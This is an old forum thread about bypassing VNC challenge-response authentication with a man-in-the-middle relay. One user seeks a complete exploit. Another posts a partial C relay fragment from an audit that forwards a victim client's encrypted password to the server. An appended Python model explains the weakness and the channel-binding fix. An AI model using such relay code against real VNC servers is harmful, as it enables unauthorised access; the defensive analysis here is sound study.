Hi, I know that there is an exploit to bypass the VNC authentication by using a MITM.
I found several sources for the MITM code, but not the whole exploit. There's only a small part of the exploit published on the web.
Does someone have the whole (maybe compiled) source code of the VNC weak authentication exploit (remote of course) and would give it to me, or swap it with me? I'm a skilled VB coder.
German (translated): Hi, there is a weak authentication exploit ... well, I only find the MITM code, but not the complete exploit code. There is only a small piece of the real exploit. Does any of you happen to have this whole exploit code (also compiled) and would give it to me!? Or swap it? I can code Visual Basic very well.
Cya Flinston
thatsmej
Oct 7 2003, 06:30 AM
yeah, I recently was searching for it too..
I found something like it..
but I'm not at home now.....
point your browser to www.securiteam.com
there you can find the source (I thought)
Flinston
Oct 7 2003, 08:07 AM
well, you only find a small part of the exploit there ...
You can't compile it. First you need thousands of header packages, and second it's not a real exploit ... just "how it would be", and I'm not able to code this piece of code into a real exploit, even if I had the header packages ...
  /* we connect to the real VNC server */
  if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc)) == -1) {
    perror ("connect");
    exit (-1);
  }

  /* again, we read version number from the VNC server */
  if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
    perror ("read");
    exit (-1);
  }

  strcpy (buf, "RFB 003.003\n");

  /* and we send ours */
  if (write (vncfd, buf, strlen (buf)) < strlen (buf)) {
    perror ("write");
    exit (-1);
  }

  /* we now read authentication method code from VNC server */
  if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
    perror ("read");
    exit (-1);
  }

  /* here is the challenge from server */
  if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
    perror ("read");
    exit (-1);
  }

  /* we send the challenge to the victim client */
  if (write (clientfd, buf, 16) < 16) {
    perror ("write");
    exit (-1);
  }

  /* we have the encrypted password from the client */
  if ((nbytes = read (clientfd, buf, BUFSIZ)) <= 0) {
    perror ("read");
    exit (-1);
  }

  /* we send the encrypted password to the VNC server */
  if (write (vncfd, buf, 16) < 16) {
    perror ("write");
    exit (-1);
  }

  /* we read the result from the authentication process */
  if (read (vncfd, buf, BUFSIZ) < 4) {
    perror ("read");
    exit (-1);
  }

  /* at this point we should be authenticated */
  /* place whatever code you want here */

  close (clientfd);
  close (sockfd);
  close (vncfd);

  return 0;
}
Flinston
Oct 7 2003, 10:29 AM
bleh ;P Try to compile it ... I tried it for hours ... even if you get all the header packages you'll find out that THIS is only A SHORT PIECE of the whole exploit!
This is one piece of code I used in a security audit.
In it, we got to fake entries in the DNS server of the machines accessing one VNC server (inside the audited internal network), so I just wrote this little trojan to demonstrate how we could bypass the challenge-response mechanism imposed by VNC to protect the password from being sniffed.
I hope it can be useful for someone X-)
monolith
Oct 9 2003, 10:29 PM
I don't think it's possible to exploit a VNC server. You just need to check out the source code of WinVNC to see that. It works this way:
1. The client (you) connects to the VNC server.
2. WinVNC creates a RANDOM! challenge code.
3. It sends the challenge code to the client.
4. The client crypts the password you entered with the challenge code.
5. The WinVNC server crypts the right password (from the registry) with the challenge code it sent to you.
6. Now the server compares its own challenge code with the one it got from you. If it's right you become authenticated.
so... WinVNC does not send a crypted pass or any other interesting data to you... the only way... is brute-force
greets Monolith
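Both posts above describe the same protocol from opposite sides: Monolith's steps 1 to 6 are the RFB 3.3 challenge-response, and the posted C fragment is a host that simply forwards the challenge one way and the response the other. The following Python model, added here and not from the thread or from any VNC project, shows why both are right at once: the password never crosses the wire (so sniffing it is indeed useless), yet a relay passes unchanged because nothing in the response ties it to the endpoint the client actually reached. It then shows the defender's fix, binding the response to an endpoint fingerprint (the hash of a pinned TLS certificate or host key, assumed here), after which a relayed response is rejected. HMAC-SHA256 stands in for the DES-with-password-as-key of real VNC; that substitution is an assumption and does not affect the relay property being demonstrated.

```python
"""Model of VNC-style challenge-response auth: a transparent relay passes it,
a channel-bound variant does not. Educational model, not VNC project code."""
import hashlib
import hmac
import os

CHALLENGE_LEN = 16  # RFB 3.3 VNC authentication uses a 16-byte random challenge


def vnc_like_response(password: bytes, challenge: bytes, binding: bytes = b"") -> bytes:
    """Response = MAC(password, challenge || binding).

    Real VNC DES-encrypts the challenge with the password as key; HMAC-SHA256
    is an assumed stand-in. Only the challenge and this MAC ever travel over
    the wire; the password itself does not (Monolith's point)."""
    return hmac.new(password, challenge + binding, hashlib.sha256).digest()


class VncServer:
    """Holds the real password (step 5 takes it from the registry) and its own
    endpoint fingerprint (assumed: hash of a pinned certificate or host key)."""

    def __init__(self, password: bytes, fingerprint: bytes, bind_to_endpoint: bool):
        self.password = password
        self.fingerprint = fingerprint
        self.bind_to_endpoint = bind_to_endpoint
        self.challenge = None

    def new_challenge(self) -> bytes:
        self.challenge = os.urandom(CHALLENGE_LEN)  # step 2: fresh random challenge
        return self.challenge

    def verify(self, response: bytes) -> bool:
        binding = self.fingerprint if self.bind_to_endpoint else b""
        expected = vnc_like_response(self.password, self.challenge, binding)  # step 5
        return hmac.compare_digest(expected, response)                         # step 6


class VncClient:
    def __init__(self, password: bytes, bind_to_endpoint: bool):
        self.password = password
        self.bind_to_endpoint = bind_to_endpoint

    def answer(self, challenge: bytes, peer_fingerprint: bytes) -> bytes:
        # step 4: when binding is on, the client mixes in the fingerprint of the
        # endpoint it actually reached; for a relayed session that is the relay's
        binding = peer_fingerprint if self.bind_to_endpoint else b""
        return vnc_like_response(self.password, challenge, binding)


def direct_login(server: VncServer, client: VncClient) -> bool:
    """Client talks to the real server: it sees the server's own fingerprint."""
    ch = server.new_challenge()
    return server.verify(client.answer(ch, server.fingerprint))


def relayed_login(server: VncServer, client: VncClient, relay_fingerprint: bytes) -> bool:
    """An in-path host forwards the challenge and the response unchanged, which is
    all the posted C fragment does with its read()/write() pairs."""
    ch = server.new_challenge()                  # relay reads the challenge from the server
    resp = client.answer(ch, relay_fingerprint)  # relay hands it to the client, who answers
    return server.verify(resp)                   # relay forwards the answer to the server


def demo() -> dict:
    """Run every combination; returns {(mode, bound): accepted}."""
    password = b"s3cret"                                           # constructed sample
    server_fp = hashlib.sha256(b"real-server-cert").digest()       # constructed sample
    relay_fp = hashlib.sha256(b"relay-cert").digest()              # constructed sample
    results = {}
    for bound in (False, True):
        srv = VncServer(password, server_fp, bound)
        cli = VncClient(password, bound)
        results[("direct", bound)] = direct_login(srv, cli)
        results[("relayed", bound)] = relayed_login(srv, cli, relay_fp)
        # a wrong password must fail regardless of binding
        results[("wrongpw", bound)] = direct_login(srv, VncClient(b"wrong", bound))
    return results


if __name__ == "__main__":
    for (mode, bound), ok in demo().items():
        print(f"{mode:8s} bound={bound!s:5s} accepted={ok}")
```

Without binding the relayed session is accepted exactly like a direct one, which is what the audit quoted above demonstrated; with binding, the client's answer commits to the relay's fingerprint, the server verifies against its own, and the comparison fails. In practice that binding comes from running RFB over an authenticated transport (TLS with a pinned or validated certificate, or an SSH tunnel) rather than from the RFB 3.3 handshake itself, which is why the usual advice is to never expose plain VNC authentication on a network where traffic can be redirected.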